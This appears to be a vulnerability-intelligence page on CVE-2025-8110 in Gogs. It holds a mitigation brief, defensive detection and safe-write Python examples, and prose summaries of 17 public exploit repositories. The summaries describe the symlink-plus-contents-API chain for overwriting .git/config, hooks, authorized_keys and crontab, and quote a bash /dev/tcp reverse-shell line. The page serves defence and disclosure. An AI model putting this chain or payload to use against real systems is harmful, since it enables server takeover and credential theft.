Mallory
Severity: High · CISA KEV · Exploited in the wild · Public exploit

Gogs PutContents API symlink path traversal leading to code execution

Identifiers: CVE-2025-8110 · CWE-22 (Improper Limitation of a Pathname…)

CVE-2025-8110 is a vulnerability in the self-hosted Git service Gogs caused by improper symbolic link handling in the PutContents API, also described as a path traversal condition in the repository file editor. The flaw is a bypass of the earlier fix for CVE-2024-55947. An authenticated attacker can create or commit a symbolic link in a repository that points outside the repository working tree, then invoke the PutContents API to write through that symlink. Because the underlying filesystem follows the symlink target, Gogs can be induced to overwrite files outside the intended repository boundary. Public reporting specifically notes overwriting Git configuration such as sshCommand as a route to code execution. The issue has been described as affecting Gogs 0.13.3 and earlier in some reporting; other content indicates exploitation against broadly deployed Gogs instances, but precise affected-version boundaries are not fully consistent in the provided material.


ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation allows an authenticated attacker to overwrite arbitrary files on the host outside the repository, which can lead to execution of attacker-controlled commands with the privileges of the Gogs service account. Depending on deployment, this can result in compromise of the Gogs server, access to private repositories, theft of credentials or secrets accessible to the service, source-code tampering, and potential follow-on lateral movement. The vulnerability has been reported as actively exploited in the wild, with large-scale automated compromise of exposed Gogs instances.

Mitigation

If you can’t patch tonight, do this now.

Until a verified fix is deployed, reduce exposure by disabling open/self-registration, restricting who can create repositories, and removing Internet exposure by placing Gogs behind a VPN, reverse proxy allow-list, or equivalent access control. Limit authenticated access to trusted users only, because exploitation requires authentication. Monitor for suspicious repositories, unexpected symlinks committed to repositories, anomalous PutContents activity, and unauthorized changes to Git configuration or other files outside repository roots. If mitigations cannot be implemented, discontinue use of the vulnerable deployment as advised in KEV-related guidance.
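The monitoring advice above (symlinks committed to repositories, changes to Git configuration) can be turned into a simple server-side triage check. The following is an added example written for this page, not code from Gogs or from Mallory; it runs on constructed samples of what `git ls-tree -r <ref>` prints and of a repository config file, and assumes an operator on the Gogs host would feed it the real output plus the blob bodies of mode-120000 entries (which are the link targets). The sample hashes, paths and config values are constructed.

```python
"""Defensive triage for the symlink + PutContents pattern (added example)."""
import posixpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

SYMLINK_MODE = "120000"  # git tree mode for a symbolic link

# Constructed sample of `git ls-tree -r HEAD` output (hashes are made up).
SAMPLE_LS_TREE = """\
100644 blob 1a2b3c4d1a2b3c4d1a2b3c4d1a2b3c4d1a2b3c4d\tREADME.md
100755 blob 2b3c4d5e2b3c4d5e2b3c4d5e2b3c4d5e2b3c4d5e\tscripts/build.sh
120000 blob 3c4d5e6f3c4d5e6f3c4d5e6f3c4d5e6f3c4d5e6f\tmalicious_link
120000 blob 4d5e6f704d5e6f704d5e6f704d5e6f704d5e6f70\tdocs/latest
"""

# Constructed sample: for a mode-120000 entry the blob body is the link
# target, i.e. what `git cat-file -p <sha>` would print for that object.
SAMPLE_SYMLINK_TARGETS: Dict[str, str] = {
    "malicious_link": ".git/config",  # the pattern the advisory describes
    "docs/latest": "v2",              # benign in-tree link
}

# Constructed samples of a repository config file, clean and tampered.
SAMPLE_CONFIG_CLEAN = "[core]\n\trepositoryformatversion = 0\n\tbare = true\n"
SAMPLE_CONFIG_TAMPERED = (
    "[core]\n\trepositoryformatversion = 0\n\tbare = true\n"
    "\tsshCommand = PLACEHOLDER_ATTACKER_CONTROLLED\n"
)


@dataclass
class Finding:
    path: str    # tree path of the symlink entry
    target: str  # link target stored in the blob
    reason: str  # why it was flagged


def parse_ls_tree(text: str) -> List[Tuple[str, str, str, str]]:
    """Split `git ls-tree -r` lines into (mode, type, sha, path)."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        meta, path = line.split("\t", 1)
        mode, otype, sha = meta.split()
        entries.append((mode, otype, sha, path))
    return entries


def classify_symlink_target(link_path: str, target: str) -> Optional[str]:
    """Pure path logic (no filesystem access): resolve the link relative to
    its own directory in the tree and say why it is suspicious, or None."""
    if target.startswith("/"):
        return "absolute target"
    resolved = posixpath.normpath(posixpath.join(posixpath.dirname(link_path), target))
    if resolved == ".." or resolved.startswith("../"):
        return "escapes repository tree"
    if ".git" in resolved.split("/"):
        return "points into .git metadata"
    return None


def symlink_findings(ls_tree_text: str, targets: Dict[str, str]) -> List[Finding]:
    """Flag every mode-120000 entry whose target leaves the tree or hits .git."""
    findings = []
    for mode, _otype, _sha, path in parse_ls_tree(ls_tree_text):
        if mode != SYMLINK_MODE:
            continue
        target = targets.get(path, "")
        reason = classify_symlink_target(path, target)
        if reason:
            findings.append(Finding(path, target, reason))
    return findings


_SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
_KEY_RE = re.compile(r"^\s*([A-Za-z0-9-]+)\s*=\s*(.*)$")


def injected_config_keys(config_text: str, watch=("sshCommand",)) -> List[str]:
    """Return 'section.key' for every watched key present in a git config.
    Git config keys are case-insensitive, so compare lowercased."""
    wanted = {w.lower() for w in watch}
    hits, section = [], None
    for line in config_text.splitlines():
        m = _SECTION_RE.match(line)
        if m:
            section = m.group(1).strip()
            continue
        m = _KEY_RE.match(line)
        if m and m.group(1).lower() in wanted:
            hits.append(f"{section}.{m.group(1)}")
    return hits


def triage(ls_tree_text: str, targets: Dict[str, str], config_text: str) -> dict:
    """One-shot summary for a single repository."""
    return {
        "symlinks": [(f.path, f.target, f.reason) for f in symlink_findings(ls_tree_text, targets)],
        "config": injected_config_keys(config_text),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_LS_TREE, SAMPLE_SYMLINK_TARGETS, SAMPLE_CONFIG_TAMPERED))
```

Run it over every repository Gogs stores (and over the working copies it keeps for the editor); an in-tree symlink is normal, but one whose target resolves into `.git` or outside the tree, or any `sshCommand` entry in a repository config, is worth an incident ticket rather than a log line.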

Remediation

Patch, then assume compromise.

Apply the vendor fix for CVE-2025-8110 as soon as an updated Gogs release or patched image is available. The provided content references code changes associated with Gogs pull request #8082 and a referenced commit 553707f3fd5f68f47f531cfcff56aa3ec294c6f6, but also includes discussion questioning whether early patch attempts fully addressed the issue due to possible TOCTOU concerns. If using vendor container images, update to images that explicitly include the CVE-2025-8110 fix. Validate that the deployed fix prevents symlink traversal in the PutContents path handling rather than relying only on pre-checks vulnerable to races.
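To make the last sentence concrete (and the mechanism in the description above), here is an added illustration, written for this page in Python rather than Go and not taken from Gogs or from the referenced pull request, of why a check-then-write guard is the wrong shape for this fix and what a write that cannot be raced looks like. It assumes a Linux/POSIX host (it uses `dir_fd` and `O_NOFOLLOW`) and builds its own throwaway working copy; the config payload it writes is a labelled placeholder.

```python
"""Check-then-write versus O_NOFOLLOW component walk (added example)."""
import errno
import os
import tempfile


class UnsafePath(Exception):
    """Raised when a write would leave the tree or pass through a symlink."""


def naive_write(root: str, rel: str, data: bytes) -> None:
    """The pattern the remediation text warns about: realpath() is checked
    once, then a normal open() follows the symlink again at write time.
    A link that resolves *inside* root (link -> .git/config) passes the
    containment check, and even a stricter check can be raced (TOCTOU)."""
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root_real, target]) != root_real:
        raise UnsafePath(rel)
    with open(os.path.join(root, rel), "wb") as fh:  # follows symlinks
        fh.write(data)


def write_nofollow(root: str, rel: str, data: bytes) -> None:
    """Open each component relative to the previous directory fd with
    O_NOFOLLOW, so a symlink anywhere in the path fails the open itself;
    there is no separate check for a race to slip between."""
    parts = rel.split("/")
    if os.path.isabs(rel) or any(p in ("", ".", "..") for p in parts):
        raise UnsafePath(rel)
    if ".git" in parts:  # repository metadata is never a valid editor target
        raise UnsafePath(rel)
    *dirs, name = parts
    fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for d in dirs:
            try:
                nfd = os.open(d, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=fd)
            except OSError as exc:
                if exc.errno in (errno.ELOOP, errno.ENOTDIR):
                    raise UnsafePath(rel) from exc
                raise
            os.close(fd)
            fd = nfd
        flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
        try:
            ffd = os.open(name, flags, 0o644, dir_fd=fd)
        except OSError as exc:
            if exc.errno == errno.ELOOP:  # final component is a symlink
                raise UnsafePath(rel) from exc
            raise
        with os.fdopen(ffd, "wb") as fh:
            fh.write(data)
    finally:
        os.close(fd)


def demo() -> dict:
    """Build a throwaway working copy containing a relative symlink of the
    kind a checked-out mode-120000 entry produces, then compare both writers."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, ".git"))
        cfg = os.path.join(root, ".git", "config")
        with open(cfg, "wb") as fh:
            fh.write(b"[core]\n\tbare = false\n")
        os.symlink(".git/config", os.path.join(root, "link"))
        payload = b"[core]\n\tsshCommand = PLACEHOLDER_NOT_A_REAL_COMMAND\n"

        naive_write(root, "link", payload)  # passes the check, lands on .git/config
        with open(cfg, "rb") as fh:
            naive_overwrote = fh.read() == payload

        try:
            write_nofollow(root, "link", payload)
            nofollow_refused = False
        except UnsafePath:
            nofollow_refused = True

        write_nofollow(root, "README.md", b"hello\n")  # ordinary file still works
        with open(os.path.join(root, "README.md"), "rb") as fh:
            regular_ok = fh.read() == b"hello\n"

        return {
            "naive_overwrote_git_config": naive_overwrote,
            "nofollow_refused_symlink": nofollow_refused,
            "nofollow_wrote_regular_file": regular_ok,
        }


if __name__ == "__main__":
    print(demo())
```

The point for verification is the shape, not the language: a deployed fix should fail at the open (or the equivalent `Lstat`/`O_NOFOLLOW` handling in Go) rather than pass a path through a separate containment check first, because the second shape is exactly what the TOCTOU discussion in the remediation notes is about.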
PUBLIC EXPLOITS

Exploits

17 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (6 hidden).

Valid: 17 / 23 total
CVE-2025-8110-PoC · Maturity: PoC · Verified exploit

Repository contains a README and a single Python exploit script, poc.py. The script is a standalone operational proof-of-concept for CVE-2025-8110 against Gogs v0.13.3, exploiting the UpdateRepoFile symlink handling flaw to achieve remote code execution. The exploit logs into the target web application using supplied credentials, scrapes CSRF tokens from HTML, creates a personal API token from /user/settings/applications, creates a new repository via POST /api/v1/user/repos, then clones that repository locally using Git over HTTP with embedded credentials. It creates and pushes a symlink named x pointing to .git/config, then uses PUT /api/v1/repos/{owner}/{repo}/contents/x to overwrite the server-side working copy's .git/config with a malicious configuration containing core.sshCommand set to a bash reverse shell. A second PUT to the same endpoint is used to trigger Gogs' git fetch origin behavior, which reads the poisoned config and executes the shell command. The exploit includes a local pre-check for a listening socket by parsing /proc/net/tcp, uses subprocess to invoke git commands, and disables TLS verification warnings. Overall, this is a real exploit rather than a detector: it provides full end-to-end automation for authenticated web-to-RCE exploitation of vulnerable Gogs instances.

mananispiwpiw · Disclosed May 20, 2026 · Languages: python, markdown · Surface: web, network
CVE-2025-8110-Silentium-HTB · Maturity: PoC · Verified exploit

This repository is a small standalone Python proof-of-concept exploit for CVE-2025-8110 in Gogs. It contains one main exploit script (CVE-2025-8110.py), a README describing the vulnerability and usage, a requirements file, and a license. The script uses requests, BeautifulSoup, and local git subprocess calls to automate the full exploitation chain. Exploit flow: it logs into Gogs through /user/login by scraping a CSRF token, creates a personal application token through /user/settings/applications, creates a new repository through /api/v1/user/repos, clones that repository locally into /tmp/<repo>, creates and commits a symlink named malicious_link pointing to .git/config, pushes the symlink, and finally calls PUT /api/v1/repos/<user>/<repo>/contents/malicious_link with base64-encoded content containing a crafted git config. That config injects sshCommand set to a bash reverse shell. Because the vulnerable API follows the symlink, the server-side .git/config is overwritten, leading to remote code execution when Gogs later performs an SSH-related git operation. The exploit is operational rather than a simple detector: it includes a working payload, automates token generation and repository setup, and supports optional proxying through localhost:8080 for interception. It requires valid credentials on the target Gogs instance and assumes the target is vulnerable to symlink-based file overwrite through the contents API. The primary capability is authenticated server-side RCE with a reverse shell callback to an attacker-supplied host and port.

hassan-hamadi · Disclosed Apr 17, 2026 · Languages: python, markdown · Surface: web, network
CVE-2025-8110 · Maturity: PoC · Verified exploit

This repository is a small standalone Python proof-of-concept exploit for CVE-2025-8110 affecting Gogs. It contains two files: a README describing the attack flow and usage, and a single executable script, exploit.py, which implements the full exploit chain. The exploit is an authenticated web/API attack against Gogs. It first logs into the target web application using /user/login and extracts a CSRF token from the login page. It then uses a supplied API token to create a new repository through /api/v1/user/repos. Next, it locally clones that repository with embedded credentials in the clone URL, creates a symlink named malicious_link pointing to .git/config, commits it, and pushes it back to the server using git. Finally, it abuses the Gogs contents API at /api/v1/repos/{username}/{repo_name}/contents/malicious_link to write attacker-controlled base64 content through the symlink, thereby overwriting .git/config. The overwritten git config injects core.sshCommand with a hardcoded bash reverse shell payload: bash -c 'bash -i >& /dev/tcp/<host>/<port> 0>&1' #. The intended result is server-side command execution and a reverse shell callback to the attacker. The script supports an optional local interception proxy at localhost:8080, disables TLS verification warnings, and requires valid Gogs credentials, an API token, and git installed locally. Overall, this is a real exploit rather than a detector. It is operational but not highly modular: the payload is fixed to a bash reverse shell, though the callback host and port are user-supplied. The repository purpose is clearly to demonstrate authenticated RCE in vulnerable Gogs versions via symlink bypass and malicious sshCommand injection.

X4BROZER · Disclosed Apr 15, 2026 · Languages: python, markdown · Surface: web, network
CVE-2025-8110-Exploit · Maturity: PoC · Verified exploit

This repository is a small standalone Python proof-of-concept exploit for CVE-2025-8110 targeting Gogs. It contains two files: a README describing the vulnerability and usage, and a single executable script, exploit.py, which is the main entry point. The exploit is not part of a larger framework. The script performs end-to-end authenticated exploitation. It accepts a target Gogs base URL, attacker listener host/port, and either credentials or an API token. If no token is supplied, it creates one via the Gogs API. It then creates a repository named pwn-repo, initializes a local Git repository in a temporary directory, creates a symlink pointing to .git/config, commits it, and pushes it to the remote Git service. Notably, the push target is hardcoded to 127.0.0.1:3001 and the HTTP Host header is hardcoded to staging-v2-code.dev.silentium.htb, indicating the exploit was tailored to a specific environment or lab setup. After pushing the symlink, the script queries the repository contents API to obtain the symlink SHA, then uses the contents update API to overwrite the symlink target. The uploaded content is a malicious .git/config containing an injected sshCommand directive with a bash reverse shell payload. The payload connects back to the attacker-supplied lhost:lport using /dev/tcp. The exploit reports success after the malicious config is uploaded, but actual code execution is intended to occur when the repository is later cloned or pulled. Primary capabilities: authenticated API token creation, repository creation, Git-based symlink delivery, API-based overwrite of .git/config through the symlink, and reverse-shell command injection. This is a real exploit rather than a detector. Its payload is basic but functional, making the maturity best described as OPERATIONAL.

NetsecBandit · Disclosed Apr 14, 2026 · Languages: markdown, python · Surface: web, network
CVE-2025-8110 · Maturity: PoC · Verified exploit

Repository contains two files: a README describing CVE-2025-8110 and a single Python exploit implementation (exploit.py). The exploit targets Gogs <= 0.13.3 and abuses the PutContents API path validation weakness by first committing a symlink into an attacker-controlled repository and then using the API to write through that symlink to an arbitrary server-side file. The code is a standalone Python CLI tool, not tied to a major exploitation framework. Based on the visible code and README, its workflow is: normalize target URL, create a requests session, optionally verify the target is Gogs/vulnerable, authenticate, create a repository, push a symlink via local git operations, invoke the vulnerable /api/v1/repos/.../contents/... endpoint, then optionally trigger execution depending on the selected strategy. Supported capabilities include check-only detection, arbitrary file write, SSH authorized_keys planting, cron-based reverse shell setup, .git/config sshCommand poisoning, and Git hook overwrite/triggering. The script also supports cleanup, JSON-style reporting, proxying, SSL verification control, and configurable timeout/output. Fingerprintable targets include the Gogs REST API prefix /api/v1 and sensitive filesystem paths such as /root/.ssh/authorized_keys, /etc/crontab, .git/config, and hooks/pre-receive. Overall, this is an operational authenticated web exploit that escalates a repository content-write primitive into arbitrary file overwrite and practical RCE on misconfigured or root-running Gogs deployments.

popyue · Disclosed Apr 13, 2026 · Languages: python, markdown · Surface: web, network
CVE-2025-8110 · Maturity: PoC · Verified exploit

Repository contains a single Python exploit script and a short README. The main file, CVE-2025-8110.py, is a standalone exploit targeting Gogs and automates an authenticated remote code execution chain. It logs into a Gogs instance, creates an application token from /user/settings/applications, creates a new repository through /api/v1/user/repos, clones that repository locally with embedded credentials, adds a symlink named malicious_link pointing to .git/config, commits and pushes it, then uses the repository contents API at /api/v1/repos/{username}/{repo_name}/contents/malicious_link to write attacker-controlled content through the symlink. The written content is a crafted git config that sets sshCommand to a bash reverse shell payload. The intended effect is arbitrary command execution on the target, with a reverse shell connecting back to the attacker-supplied host and port. The script supports an intercepting proxy at localhost:8080, disables TLS verification, and requires valid credentials plus repository creation capability. The README mainly documents command-line usage, but it inconsistently references CVE-2025-59528 while the script identifies itself as CVE-2025-8110; functionally, the code is clearly an exploit rather than a detector.

0dgt · Disclosed Apr 12, 2026 · Languages: python, markdown · Surface: web, network
HTB · Maturity: PoC · Verified exploit

This repository is primarily a collection of HackTheBox writeups, but it also contains real exploit automation in the `VariaType/` directory. The actionable exploit consists of one Bash orchestrator (`exploit_variatype.sh`) and four Python phase scripts. The exploit is not tied to a common framework like Metasploit; it is custom automation for a multi-stage Linux target compromise. Main exploit capabilities: (1) reconnaissance and extraction of credentials from an exposed `.git` repository on `portal.variatype.htb`; (2) login and LFI verification against `download.php`; (3) preparation of malicious font files and a crafted designspace document to exploit CVE-2025-66034 in fontTools varLib, causing arbitrary file write of a PHP webshell to `/var/www/portal.variatype.htb/public/files/shell.php`; (4) privilege escalation to user `steve` using a ZIP filename command injection payload associated with CVE-2024-25082, which appends an attacker SSH key into `/home/steve/.ssh/authorized_keys`; and (5) privilege escalation to root by abusing `sudo /usr/bin/python3 /opt/font-tools/install_validator.py` with a URL-encoded absolute path traversal to write the attacker’s public key into `/root/.ssh/authorized_keys`. Repository structure: most files are Markdown writeups for HTB machines/challenges. Only 5 files contain exploit code, all under `VariaType/`. `phase1_git_extract.py` handles exposed Git extraction and credential recovery. `phase2_rce_exploit.py` generates malicious font/designspace artifacts for the webshell stage, though upload is partly left manual in that script. `phase3_privesc_steve.py` generates an SSH key, builds an evil ZIP with a filename-based command injection payload, serves it over HTTP, and attempts to place it on the target for later processing. `phase4_privesc_root.py` serves a root public key and invokes the vulnerable validator script over SSH as steve to gain root SSH access. `exploit_variatype.sh` ties the phases together into a mostly automated end-to-end attack. Overall, this is a valid exploit repository with operational code, not just detection logic. The exploit targets a web-exposed Linux application stack and culminates in full root compromise with SSH persistence.

secopssite · Disclosed Feb 22, 2026 · Languages: bash, python · Surface: web, network, local
CVE-2025-8110-Gogs-RCE-Exploit · Maturity: PoC · Verified exploit

This repository is a small standalone Python exploit for CVE-2025-8110 in Gogs. It contains two files: a README with setup and usage instructions, and a single executable script, exploit.py, which is the main entry point. The exploit is not part of a larger framework. The exploit workflow is straightforward and operational: it authenticates to the Gogs API using a personal access token, creates a new repository, then locally clones that repository using attacker-supplied username/password credentials. Inside the cloned repository it creates a symlink named malicious_link pointing to .git/config, commits it, and pushes it back to the server with git. It then calls the Gogs repository contents API on /api/v1/repos/{username}/{repo_name}/contents/malicious_link, first to retrieve the object SHA and then to issue a PUT request containing base64-encoded replacement content. Because the vulnerability is described as improper symlink validation in the PutContents API, the overwrite lands on the internal .git/config file rather than a normal repository file. The injected .git/config payload sets sshCommand to a bash reverse shell using /dev/tcp/<LHOST>/<LPORT>. If the target later invokes that sshCommand in the relevant git/ssh context, the attacker receives remote code execution as a reverse shell. The script disables TLS verification warnings, uses requests for API interaction, subprocess for git operations, and requires git to be installed locally. Overall, this is a real exploit with a hardcoded but effective payload, intended to achieve authenticated remote code execution against a vulnerable Gogs instance.

TYehan · Disclosed Apr 12, 2026 · Languages: markdown, python · Surface: web, network
CVE-2025-8110-Authenticated-Remote-Code-Execution-on-Gogs-v0.13.3- · Maturity: PoC · Verified exploit

This repository contains a single Python exploit script, gogs_rce.py, plus a README demonstrating usage. It is a real authenticated remote code execution exploit targeting Gogs v0.13.3, identified in the repository as CVE-2025-8110. The exploit is not part of a larger framework. The script automates a multi-step attack chain against a Gogs instance. First, it authenticates to the target using a supplied API token and queries /api/v1/user to determine the internal username associated with the account. Next, it creates a new repository through /api/v1/user/repos. It then initializes a temporary local Git repository, creates a symlink named evil.link pointing to the server-side Git hook path /root/gogs-repositories/<username>/<repo>.git/hooks/pre-receive, commits that symlink, and pushes it to the target repository using HTTP(S) Git authentication with the supplied email and password embedded in the clone/push URL. After the symlink is present in the repository, the script uses the Gogs contents API at /api/v1/repos/<username>/<repo>/contents/evil.link to retrieve the object SHA and then update the symlink target content with a shell script containing a Python3 reverse shell one-liner. Because the symlink points to the pre-receive hook on disk, this effectively overwrites the hook. Finally, the script commits a trivial file (trigger.txt) and performs another git push, causing the pre-receive hook to execute and connect back to the attacker-controlled LHOST:LPORT. The README shows this resulting in a root shell, though the actual privilege level depends on the user running the Gogs process. Repository structure is minimal: README.md documents prerequisites and example execution, while gogs_rce.py contains the full exploit logic, argument parsing, API interaction, local Git operations, payload generation, and trigger step. The exploit’s main capability is authenticated RCE with reverse shell delivery via Git hook overwrite using a symlink attack.

manbahadurthapa1248 · Disclosed Apr 12, 2026 · Languages: python, markdown · Surface: web, network
cve-2025-8110-GOGS-RCE · Maturity: PoC · Verified exploit

This repository is a small standalone Python exploit for CVE-2025-8110 affecting Gogs <= 0.13.3. It is not part of a larger exploitation framework. The repo contains three files: a README with usage and attack-chain explanation, a requirements.txt listing requests/urllib3/beautifulsoup4, and the main exploit script cve-2025-8110.py. The exploit script automates a full end-to-end RCE chain against a vulnerable Gogs server. Based on the visible code and README, its workflow is: register a disposable user account (or reuse supplied credentials), log in through the web interface, scrape CSRF tokens from HTML, obtain an API bearer token, create a repository, clone/push content locally using git, add a malicious relative symlink named malicious_link pointing to .git/config, then use the Gogs contents API to overwrite the repository’s Git configuration through that symlink. The malicious config embeds an sshCommand that executes a callback to an attacker-controlled host and port. Finally, the script triggers execution by cloning the repository over SSH, causing the target host to run the injected command and connect back to the attacker. Primary capabilities include authenticated web exploitation, API abuse, local git orchestration via subprocess, repository manipulation, arbitrary overwrite of .git/config through a symlink bypass, and remote code execution with reverse-shell style behavior. The script also supports skipping registration when credentials are already known, disabling TLS verification, and optionally routing traffic through a local proxy at 127.0.0.1:8080 for debugging. The attack surface is both web and network based: the exploit interacts with Gogs HTTP endpoints for registration/authentication/API operations and then uses SSH Git access to trigger the payload. The most important fingerprintable artifacts are the /user/sign_up path, CSRF form field extraction, the targeted .git/config file, the malicious symlink name malicious_link, the attacker callback host/port, and the SSH clone operation against the target. Overall, this is a real operational exploit rather than a detector or fake PoC.

kayl22 · Disclosed Apr 11, 2026 · Languages: python, markdown · Surface: web, network
CVE-2025-8110 · Maturity: PoC · Verified exploit

This repository is a small standalone Python exploit for CVE-2025-8110 targeting Gogs <= 0.13.3. The repo contains one main code file (CVE-2025-8110.py), a README describing the vulnerability and usage, and an MIT license. The exploit is not part of a larger framework. The exploit automates an authenticated arbitrary file write via symlink traversal in Gogs' PutContents API. Its workflow is: detect the target version, optionally self-register a new user, log in via the web interface, create an API token, create a repository, locally push a symlink whose target is an arbitrary absolute path on the server, and then invoke the vulnerable contents API to write attacker-controlled data through that symlink. The intended outcome is host-level compromise when Gogs runs with elevated privileges. Capabilities include account self-registration, session-based login, API token creation, repository creation, symlink-based Git commit/push, arbitrary file overwrite, and optional cleanup of the created repository. The exploit supports arbitrary content input either inline or from a local file. The README and script explicitly demonstrate overwriting /root/.ssh/authorized_keys for persistent root SSH access and /etc/crontab for command execution via cron, including a bash reverse shell example. Operationally, this is more than a simple detector: it is a working exploitation script with a hardcoded exploitation chain and user-supplied payload content, making it OPERATIONAL rather than a basic POC. The attack surface is primarily web/API-based, with the vulnerable endpoint centered on /api/v1/repos/{owner}/{repo}/contents/{path}. The code also interacts with /api/v1/version, /user/sign_up, /user/login, and /api/v1/users/{user}/tokens as part of setup and exploitation.

3jee · Disclosed Apr 11, 2026 · Languages: python, markdown · Surface: web, network
CVE-2025-8110 · Maturity: PoC · Verified exploit

This repository is a small standalone Python exploit PoC for CVE-2025-8110 in Gogs. It contains one main exploit script (CVE-2025-8110-RCE.py), a README with usage instructions, and a requirements file. The script automates an authenticated remote code execution chain against Gogs by logging into the web UI, creating a repository through the API, cloning it locally with embedded credentials, adding and pushing a symlink named 'malicious_link' that points to '.git/config', and then using the repository contents API to overwrite the symlink target with attacker-controlled git configuration. The malicious configuration injects an 'sshCommand' directive containing a bash reverse shell. The intended effect is that when the Gogs server later performs a git operation that uses SSH transport, the injected sshCommand executes and connects back to the attacker at the supplied host and port. The exploit uses both session-based authentication and a hardcoded API token, disables TLS verification, optionally supports a local proxy at localhost:8080, and relies on local git being installed to perform clone/add/commit/push operations. Main capabilities: authenticated login, repository creation, symlink-based path traversal/bypass setup, API-driven overwrite of .git/config, and reverse-shell RCE delivery. The code is operational rather than a simple detector because it includes a complete exploitation workflow and a concrete payload, though payload customization is limited to attacker host/port arguments. Notable hardcoded values include username 'pwnuser', a static token string, local temp path '/tmp/{repo_name}', and an injected remote URL 'git@localhost:gogs/{repo_name}.git'.

Ghxstsec · Disclosed Apr 11, 2026 · Languages: python, markdown · Surface: web, network
CVE-2025-8110-Gogs-Remote-Code-Execution · Maturity: PoC · Verified exploit

Repository contains a small proof-of-concept for achieving RCE against Gogs versions prior to 0.13.0 by abusing command injection in the Git hook mechanism. Structure:
README.md: States affected product/version and describes the issue as command injection via crafted Git hooks requiring push access.
bash.sh: Example malicious server-side post-receive hook that reads standard hook input (oldrev/newrev/refname) and spawns a background reverse shell using bash TCP redirection to attacker.com:4444.
exploit.py: Local helper that creates a fake repository directory at /tmp/malicious_repo, writes a .git/hooks/post-receive hook that runs `id > /tmp/gogs_exploited`, marks it executable, and instructs the user to push to trigger execution.
Capabilities: plants/illustrates a malicious post-receive hook payload and demonstrates arbitrary command execution; includes an example reverse shell payload. No actual network push logic is implemented in code; triggering is implied by manually pushing the prepared repository to a vulnerable Gogs server where the hook would execute.

George0Papasotiriou · Disclosed Feb 10, 2026 · Languages: python, bash · Surface: network (authenticated/authorized push access) leading to server-side command execution via Git hook command injection
Ashwesker-CVE-2025-8110 · Maturity: PoC · Verified exploit

This repository contains a proof-of-concept (PoC) exploit for CVE-2025-8110, a high-severity remote code execution (RCE) vulnerability in Gogs, a self-hosted Git service. The exploit leverages a symlink path traversal flaw in the Gogs API, specifically the 'PutContents' endpoint, which fails to validate whether symlinks point outside the repository. The attacker authenticates to the Gogs instance, creates a symlink in a repository pointing to an arbitrary file on the server, and then uses the API to overwrite that file with attacker-controlled content. If the target is the '.git/config' file, the exploit injects a malicious SSH configuration that, when triggered by a Git operation, causes the server to execute a reverse shell to the attacker's host. The repository consists of two files: the main exploit script (CVE-2025-8110.py) written in Python, and a detailed README.md explaining the vulnerability, exploitation steps, mitigation advice, and usage instructions. The exploit is network-exploitable, requires low privileges, and is effective against unpatched Gogs instances. No hardcoded IPs or domains are present; the attacker supplies the target URL and payload parameters at runtime.

Ashwesker · Disclosed Dec 11, 2025 · Languages: python, markdown · Surface: network
goga-cve-2025-8110 · Maturity: PoC · Verified exploit

This repository provides a fully operational exploit for CVE-2025-8110, a critical vulnerability in Gogs (version 0.13.2, likely affecting other versions) that allows arbitrary file overwrite and remote code execution (RCE) via symlink abuse in the API. The exploit works by creating a malicious symlink in a git repository (pointing to a sensitive file such as .git/config), pushing it to the server, and then using the Gogs API to overwrite the symlinked file. By injecting a malicious sshCommand into the config, the attacker achieves RCE when the server performs a git operation involving SSH. The repository contains two main Python scripts: 'exploit-cve-2025-8110.py' (a full-featured, interactive exploit and verification tool) and 'exploit_only_cve_2025_8110.py' (a minimal, pure exploit script). The included markdown report details the vulnerability, exploitation steps, and verification results. The exploit targets the Gogs API endpoint at /api/v1/repos/{user}/{repo}/contents/{symlink_file} and abuses the server's file system at /data/git/gogs-repositories/{user}/{repo}.git/config. The payload is a git config file with a malicious sshCommand that, when triggered, executes arbitrary shell commands on the server. The exploit is operational and demonstrates end-to-end compromise, including file creation as proof of RCE. The repository also contains various Gogs test data and git hook samples, but the core exploit logic is in the two Python scripts.

111ddea · Disclosed Dec 24, 2025 · Languages: python, bash · Surface: network
gogs-CVE-2025-8110 · Maturity: PoC · Verified exploit

This repository provides a Proof of Concept (PoC) exploit for CVE-2025-8110, a remote code execution vulnerability in Gogs, a self-hosted Git service. The main exploit script, 'CVE-2025-8110.py', automates the process of registering a user, logging in, generating an application token, creating a malicious repository, and injecting a symlink that abuses the SSH server's configuration handling. The exploit ultimately achieves arbitrary command execution by injecting a reverse shell command into the repository's configuration, which is then executed by the Gogs server. The payload is a bash reverse shell that connects back to the attacker's specified host and port. The repository includes supporting files for Python dependencies and a Docker Compose configuration for testing. The exploit targets Gogs instances with the internal SSH server enabled and accessible, and requires the ability to register a new user and create repositories. The attack vector is network-based, leveraging HTTP(S) API endpoints and Git operations. The endpoints used are typical Gogs user and repository management APIs, and the exploit creates a symlink to '.git/config' within the repository to facilitate the attack.

zAbuQasem · Disclosed Dec 13, 2025 · Languages: python · Surface: network
Blackash-CVE-2025-8110 · Maturity: PoC · Verified exploit

This repository contains a working proof-of-concept (PoC) exploit for CVE-2025-8110, a high-severity remote code execution vulnerability in Gogs, a self-hosted Git service. The exploit leverages a symlink path traversal flaw in the Gogs API (specifically, the /api/v1/repos/{repo}/contents/{path} endpoint) to create a symlink in a repository that points outside the repo directory. The attacker then uses the same API to overwrite arbitrary files on the server by writing through the symlink. If the attacker targets the .git/config file and injects a malicious SSH command, remote code execution is achieved when a git operation is performed by the Gogs service user. The exploit requires valid credentials (or the ability to register) and network access to the Gogs instance. The repository consists of a single Python exploit script (CVE-2025-8110.py) and a detailed README.md explaining the vulnerability, exploitation steps, mitigation advice, and usage instructions. The exploit is a PoC but demonstrates full compromise potential, including arbitrary file write and RCE via reverse shell.

Ashwesker · Disclosed Dec 11, 2025 · Languages: python, markdown · Surface: network
EXPOSURE SURFACE

Affected products & vendors

